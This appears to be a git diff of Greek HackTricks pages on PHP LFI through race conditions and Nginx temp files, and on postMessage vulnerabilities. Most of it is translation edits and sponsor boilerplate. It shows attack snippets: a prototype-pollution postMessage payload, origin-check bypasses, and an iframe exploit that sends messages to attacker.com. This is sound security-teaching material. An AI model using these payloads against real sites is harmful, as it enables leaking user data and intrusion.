**Ενώ** αυτή η **σύνδεση** υπάρχει, ο επιτιθέμενος θα **εξαγάγει τη διαδρομή** προς το προσωρινό αρχείο που δημιουργήθηκε (αυτό διαρρέεται από τον server).
|
||||
|
||||
**Ενώ** η **σύνδεση** είναι ακόμα ανοιχτή, ο επιτιθέμενος θα **εκμεταλλευτεί μια LFI φορτώνοντας το προσωρινό αρχείο** που ελέγχει.
|
||||
|
||||
Ωστόσο, υπάρχει έλεγχος στον web server που **εμποδίζει τη φόρτωση αρχείων που περιέχουν `<?`**. Επομένως, ο επιτιθέμενος θα εκμεταλλευτεί μια **Κατάσταση Αγώνα**. Στη σύνδεση που είναι ακόμα ανοιχτή, ο **επιτιθέμενος** θα **στείλει το PHP payload ΜΕΤΑ** το **webserver** να **έχει ελέγξει** αν το αρχείο περιέχει τους απαγορευμένους χαρακτήρες αλλά **ΠΡΙΝ φορτώσει το περιεχόμενό του**.
|
||||
Ωστόσο, υπάρχει έλεγχος στον web server που **εμποδίζει τη φόρτωση αρχείων που περιέχουν `<?`**. Επομένως, ο επιτιθέμενος θα εκμεταλλευτεί μια **Συνθήκη Αγώνα**. Στη σύνδεση που είναι ακόμα ανοιχτή, ο **επιτιθέμενος** θα **στείλει το PHP payload ΜΕΤΑ** το **webserver** να **έχει ελέγξει** αν το αρχείο περιέχει τους απαγορευμένους χαρακτήρες αλλά **ΠΡΙΝ φορτώσει το περιεχόμενό του**.
|
||||
|
||||
Για περισσότερες πληροφορίες ελέγξτε την περιγραφή της Κατάστασης Αγώνα και του CTF στο [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
|
||||
Για περισσότερες πληροφορίες ελέγξτε την περιγραφή της Συνθήκης Αγώνα και του CTF στο [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το dark web και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των καταλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους **δωρεάν** στο:
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -81,7 +81,7 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
|
|||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) στο GitHub.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγράφου**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,27 +2,27 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -36,7 +36,7 @@
|
|||
````h`
|
||||
<?php include_once($_GET['file']);
|
||||
```
|
||||
* FPM / PHP ρυθμίσεις:
|
||||
* FPM / PHP ρύθμιση:
|
||||
```
|
||||
...
|
||||
php_admin_value[session.upload_progress.enabled] = 0
|
||||
|
@ -50,9 +50,9 @@ chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
|
|||
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
|
||||
...
|
||||
```
|
||||
Ευτυχώς, η PHP συχνά χρησιμοποιείται μέσω του PHP-FPM και του Nginx. Το Nginx προσφέρει μια εύκολα παραβλεπόμενη [λειτουργία client body buffering](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) που θα γράψει προσωρινά αρχεία εάν το σώμα του πελάτη (όχι περιορισμένο σε post) είναι μεγαλύτερο από ένα συγκεκριμένο όριο.
|
||||
Ευτυχώς, η PHP συχνά χρησιμοποιείται μέσω PHP-FPM και Nginx. Το Nginx προσφέρει μια εύκολα παραβλεπόμενη [λειτουργία buffering σώματος πελάτη](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) που θα γράψει προσωρινά αρχεία εάν το σώμα του πελάτη (δεν περιορίζεται σε αναρτήσεις) είναι μεγαλύτερο από ένα συγκεκριμένο όριο.
|
||||
|
||||
Αυτή η λειτουργία επιτρέπει την εκμετάλλευση των LFIs χωρίς καμία άλλη δυνατότητα δημιουργίας αρχείων, εάν το Nginx τρέχει με τον ίδιο χρήστη με την PHP (πολύ συχνά γίνεται ως www-data).
|
||||
Αυτή η λειτουργία επιτρέπει στα LFIs να εκμεταλλευτούνται χωρίς καμία άλλη δυνατότητα δημιουργίας αρχείων, εάν το Nginx τρέχει με τον ίδιο χρήστη με την PHP (πολύ συχνά γίνεται ως www-data).
|
||||
|
||||
Σχετικός κώδικας Nginx:
|
||||
```c
|
||||
|
@ -292,15 +292,15 @@ read_file_multiprocess(requests_session, nginx_pids)
|
|||
|
||||
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αρπαγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -310,10 +310,10 @@ read_file_multiprocess(requests_session, nginx_pids)
|
|||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Ευπαθείς Στοιχεία PostMessage
|
||||
# Ευπαθείς Τομείς PostMessage
|
||||
|
||||
## Ευπαθείς Στοιχεία PostMessage
|
||||
## Ευπαθείς Τομείς PostMessage
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -11,18 +11,18 @@
|
|||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -59,12 +59,12 @@ win = open('URL-with-iframe-inside', 'hack', 'width=800,height=300,top=500');
|
|||
win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
|
||||
```
|
||||
Σημειώστε ότι το **targetOrigin** μπορεί να είναι ένα '\*' ή ένα URL όπως το _https://company.com._\
|
||||
Στο **δεύτερο σενάριο**, το **μήνυμα μπορεί να σταλεί μόνο σε αυτό τον τομέα** (ακόμη κι αν η προέλευση του αντικειμένου παραθύρου είναι διαφορετική).\
|
||||
Εάν χρησιμοποιηθεί το **wildcard**, τα **μηνύματα μπορούν να σταλούν σε οποιονδήποτε τομέα**, και θα σταλούν στην προέλευση του αντικειμένου παραθύρου.
|
||||
Στο **δεύτερο σενάριο**, το **μήνυμα μπορεί να σταλεί μόνο σε αυτό το domain** (ακόμα και αν η προέλευση του αντικειμένου παραθύρου είναι διαφορετική).\
|
||||
Εάν χρησιμοποιηθεί το **wildcard**, τα **μηνύματα μπορούν να σταλούν σε οποιοδήποτε domain**, και θα σταλούν στην προέλευση του αντικειμένου παραθύρου.
|
||||
|
||||
### Επίθεση σε iframe & wildcard στο **targetOrigin**
|
||||
### Επίθεση στο iframe & wildcard στο **targetOrigin**
|
||||
|
||||
Όπως εξηγείται σε [**αυτήν την αναφορά**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/), αν βρείτε μια σελίδα που μπορεί να **ενσωματωθεί μέσω iframe** (χωρίς προστασία `X-Frame-Header`) και αποστέλλει ευαίσθητο μήνυμα μέσω **postMessage** χρησιμοποιώντας ένα **wildcard** (\*), μπορείτε να **τροποποιήσετε** την **προέλευση** του **iframe** και να **διαρρεύσετε** το **ευαίσθητο** μήνυμα σε έναν τομέα που ελέγχετε εσείς.\
|
||||
Όπως εξηγείται σε [**αυτήν την αναφορά**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/), αν βρείτε μια σελίδα που μπορεί να **ενσωματωθεί μέσω iframe** (χωρίς προστασία `X-Frame-Header`) και αποστέλλει ευαίσθητο μήνυμα μέσω **postMessage** χρησιμοποιώντας ένα **wildcard** (\*), μπορείτε να **τροποποιήσετε** την **προέλευση** του **iframe** και να **διαρρεύσετε** το **ευαίσθητο** μήνυμα σε ένα domain που ελέγχετε εσείς.\
|
||||
Σημειώστε ότι αν η σελίδα μπορεί να ενσωματωθεί μέσω iframe αλλά το **targetOrigin** είναι **ορισμένο σε ένα URL και όχι σε ένα wildcard**, αυτό το **κόλπο δεν θα λειτουργήσει**.
|
||||
```markup
|
||||
<html>
|
||||
|
@ -80,9 +80,9 @@ window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
|
|||
}
|
||||
</script>
|
||||
```
|
||||
## Εκμετάλλευση της addEventListener
|
||||
## Εκμετάλλευση addEventListener
|
||||
|
||||
Η **`addEventListener`** είναι η συνάρτηση που χρησιμοποιείται από το JS για να δηλώσει τη συνάρτηση που **περιμένει `postMessages`**.\
|
||||
Η **`addEventListener`** είναι η συνάρτηση που χρησιμοποιείται από το JS για να δηλώσει τη συνάρτηση που περιμένει **`postMessages`**.\
|
||||
Θα χρησιμοποιηθεί ένας κώδικας παρόμοιος με τον παρακάτω:
|
||||
```javascript
|
||||
window.addEventListener("message", (event) => {
|
||||
|
@ -92,8 +92,6 @@ return;
|
|||
// ...
|
||||
}, false);
|
||||
```
|
||||
Σημειώστε σε αυτήν την περίπτωση πώς το **πρώτο πράγμα** που κάνει ο κώδικας είναι **έλεγχος της προέλευσης**. Αυτό είναι εξαιρετικά **σημαντικό** κυρίως αν η σελίδα πρόκειται να κάνει **οτιδήποτε ευαίσθητο** με τις ληφθείσες πληροφορίες (όπως αλλαγή κωδικού). **Αν δεν γίνεται έλεγχος της προέλευσης, οι επιτιθέμενοι μπορούν να κάνουν τα θύματα να στείλουν αυθαίρετα δεδομένα σε αυτά τα σημεία** και να αλλάξουν τους κωδικούς των θυμάτων (σε αυτό το παράδειγμα).
|
||||
|
||||
### Απαρίθμηση
|
||||
|
||||
Για να **βρείτε ακροατές συμβάντων** στην τρέχουσα σελίδα μπορείτε:
|
||||
|
@ -111,19 +109,19 @@ return;
|
|||
|
||||
### Παράκαμψη ελέγχου προέλευσης
|
||||
|
||||
* Το χαρακτηριστικό **`event.isTrusted`** θεωρείται ασφαλές καθώς επιστρέφει `True` μόνο για συμβάντα που προέρχονται από γνήσιες ενέργειες χρήστη. Αν και είναι προκλητικό να παρακαμφθεί αν υλοποιηθεί σωστά, η σημασία του στους ελέγχους ασφαλείας είναι σημαντική.
|
||||
* Η χρήση της **`indexOf()`** για την επικύρωση προέλευσης σε συμβάντα PostMessage μπορεί να είναι ευάλωτη στην παράκαμψη. Ένα παράδειγμα που επιδεικνύει αυτήν την ευπάθεια είναι:
|
||||
* Το χαρακτηριστικό **`event.isTrusted`** θεωρείται ασφαλές καθώς επιστρέφει `True` μόνο για συμβάντα που προέρχονται από γνήσιες ενέργειες χρήστη. Αν και είναι προκλητικό να το παρακάμψετε αν υλοποιηθεί σωστά, η σημασία του στους ελέγχους ασφαλείας είναι σημαντική.
|
||||
* Η χρήση της μεθόδου **`indexOf()`** για την επικύρωση προέλευσης σε συμβάντα PostMessage μπορεί να είναι ευάλωτη στην παράκαμψη. Ένα παράδειγμα που επεξηγεί αυτήν την ευπάθεια είναι:
|
||||
|
||||
```javascript
|
||||
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
|
||||
```
|
||||
* Η μέθοδος **`search()`** από `String.prototype.search()` προορίζεται για τακτικές εκφράσεις, όχι για συμβολοσειρές. Η παράδοση οτιδήποτε διαφορετικό από μια τακτική οδηγεί σε αυτόματη μετατροπή σε τακτική, κάνοντας τη μέθοδο δυνητικά ανασφαλή. Αυτό συμβαίνει επειδή στις τακτικές εκφράσεις, ένα τελεία (.) λειτουργεί ως μπαλαντέρ, επιτρέποντας την παράκαμψη της επικύρωσης με ειδικά διαμορφωμένους τομείς. Για παράδειγμα:
|
||||
* Η μέθοδος **`search()`** από `String.prototype.search()` προορίζεται για τακτικές εκφράσεις, όχι για συμβολοσειρές. Η παράδοση οτιδήποτε διαφορετικό από μια τακτική εκφραση οδηγεί σε σιωπηρή μετατροπή σε τακτική εκφραση, κάνοντας τη μέθοδο δυνητικά ανασφαλή. Αυτό συμβαίνει επειδή στις τακτικές εκφράσεις, ένα τελεία (.) λειτουργεί ως μπαλαντέρ, επιτρέποντας την παράκαμψη της επικύρωσης με ειδικά διαμορφωμένους τομείς. Για παράδειγμα:
|
||||
|
||||
```javascript
|
||||
"https://www.safedomain.com".search("www.s.fedomain.com")
|
||||
```
|
||||
* Η λειτουργία **`match()`**, παρόμοια με το `search()`, επεξεργάζεται τακτικές εκφράσεις. Αν η τακτική είναι κατασκευασμένη εσφαλμένα, ενδέχεται να είναι ευάλωτη στην παράκαμψη.
|
||||
* Η συνάρτηση **`escapeHtml`** προορίζεται για την αποσυμπίεση εισόδων με την απόδραση χαρακτήρων. Ωστόσο, δεν δημιουργεί ένα νέο αποδεδειγμένο αντικείμενο αλλά αντικαθιστά τις ιδιότητες του υπάρχοντος αντικειμένου. Αυτή η συμπεριφορά μπορεί να εκμεταλλευτεί. Ειδικότερα, αν ένα αντικείμενο μπορεί να διαχειριστεί έτσι ώστε η ελεγχόμενη ιδιότητά του να μην αναγνωρίζει το `hasOwnProperty`, το `escapeHtml` δεν θα λειτουργήσει όπως αναμένεται. Αυτό φαίνεται στα παρακάτω παραδείγματα:
|
||||
* Η λειτουργία **`match()`**, παρόμοια με το `search()`, επεξεργάζεται τακτικές εκφράσεις. Αν η τακτική εκφραση δεν είναι δομημένη σωστά, ενδέχεται να είναι ευάλωτη στην παράκαμψη.
|
||||
* Η λειτουργία **`escapeHtml`** προορίζεται για την αποσυμπίεση χαρακτήρων εισόδου. Ωστόσο, δεν δημιουργεί ένα νέο αποσυμπιεσμένο αντικείμενο αλλά αντικαθιστά τις ιδιότητες του υπάρχοντος αντικειμένου. Αυτή η συμπεριφορά μπορεί να εκμεταλλευτεί. Ειδικότερα, αν ένα αντικείμενο μπορεί να διαχειριστεί έτσι ώστε η ελεγχόμενη ιδιότητά του να μην αναγνωρίζει το `hasOwnProperty`, το `escapeHtml` δεν θα λειτουργήσει όπως αναμένεται. Αυτό φαίνεται στα παρακάτω παραδείγματα:
|
||||
|
||||
* Αναμενόμενη Αποτυχία:
|
||||
|
||||
|
@ -133,23 +131,23 @@ message: "'\"<b>\\"
|
|||
});
|
||||
result.message // "'"<b>\"
|
||||
```
|
||||
* Παράκαμψη της απόδρασης:
|
||||
* Παράκαμψη της αποσύνθεσης:
|
||||
|
||||
```javascript
|
||||
result = u(new Error("'\"<b>\\"));
|
||||
result.message; // "'"<b>\"
|
||||
```
|
||||
|
||||
Στο πλαίσιο αυτής της ευπάθειας, το αντικείμενο `File` είναι εύκολα εκμεταλλεύσιμο λόγω της ιδιότητάς του `name` που είναι μόνο για ανάγνωση. Αυτή η ιδιότητα, όταν χρησιμοποιείται σε πρότυπα, δεν αποσυμπιέζεται από τη συνάρτηση `escapeHtml`, οδηγώντας σε πιθανούς κινδύνους ασφάλειας.
|
||||
Στο πλαίσιο αυτής της ευπάθειας, το αντικείμενο `File` είναι ευάλωτο λόγω της ιδιότητάς του `name` που είναι μόνο για ανάγνωση. Αυτή η ιδιότητα, όταν χρησιμοποιείται σε πρότυπα, δεν αποσυμπιέζεται από τη λειτουργία `escapeHtml`, οδηγώντας σε πιθανούς κινδύνους ασφάλειας.
|
||||
* Η ιδιότητα `document.domain` στην JavaScript μπορεί να οριστεί από ένα σενάριο για τη σύντμηση του τομέα, επιτρέποντας μια πιο χαλαρή εφαρμογή της πολιτικής ίδιας προέλευσης εντός του ίδιου γονικού τομέα.
|
||||
|
||||
### Παράκαμψη e.origin == window.origin
|
||||
|
||||
Κατά την ενσωμάτωση μιας ιστοσελίδας μέσα σε ένα **iframe με αμμόλιθο** χρησιμοποιώντας %%%%%%, είναι κρίσιμο να κατανοήσετε ότι η προέλευση του iframe θα οριστεί σε null. Αυτό είναι ιδιαίτερα σημαντικό όταν ασχολείστε με τα **χαρακτηριστικά αμμόλιθου** και τις επιπτώσεις τους στην ασφάλεια και τη λειτουργικότητα.
|
||||
Όταν ενσωματώνετε μια ιστοσελίδα μέσα σε ένα **iframe με sandbox** χρησιμοποιώντας %%%%%%, είναι κρίσιμο να κατανοήσετε ότι η προέλευση του iframe θα οριστεί σε null. Αυτό είναι ιδιαίτερα σημαντικό όταν ασχολείστε με **χαρακτηριστικά sandbox** και τις επιπτώσεις τους στην ασφάλεια και τη λειτουργικότητα.
|
||||
|
||||
Με την καθορισμό του **`allow-popups`** στο χαρακτηριστικό του αμμόλιθου, οποιοδήποτε αναδυόμενο παράθυρο που ανοίγεται από το εσωτερικό του iframe κληρονομεί τους περιορισμούς του αμμόλιθου γονέα του. Αυτό σημαίνει ότι εκτός αν περιλαμβάνεται επίσης το χαρακτηριστικό **`allow-popups-to-escape-sandbox`**, η προέλευση του αναδυόμενου παραθύρου ορίζεται επίσης σε `null`, ευθυγραμμίζοντας με την προέλευση του iframe.
|
||||
Με την καθορισμό του **`allow-popups`** στο χαρακτηριστικό sandbox, οποιοδήποτε αναδυόμενο παράθυρο που ανοίγεται από το iframe κληρονομεί τους περιορισμούς του sandbox του γονικού του. Αυτό σημαίνει ότι εκτός αν περιλαμβάνεται επίσης το χαρακτηριστικό **`allow-popups-to-escape-sandbox`**, η προέλευση του αναδυόμενου παραθύρου ορίζεται επίσης σε `null`, ευθυγραμμίζοντας με την προέλευση του iframe.
|
||||
|
||||
Ως εκ τούτου, όταν ανοίγεται ένα αναδυόμενο παράθυρο υπό αυτές τις συνθήκες και αποστέλλεται ένα μήνυμα από το iframe στο αναδυόμενο παράθυρο χρησιμοποιώντας το **`postMessage`**, τόσο η αποστολή όσο και η λήψη έχουν τις προελεύσεις τους ορισμένες σε `null`. Αυτή η κατάσταση οδηγεί σε μια περίπτωση όπου **`e.origin == window.origin`** αξιολογείται ως αληθής (`null == null`), επειδή τόσο το iframe όσο και το αναδυόμενο παράθυρο μοιράζονται την ίδια τιμή προέλευσης του `null`.
|
||||
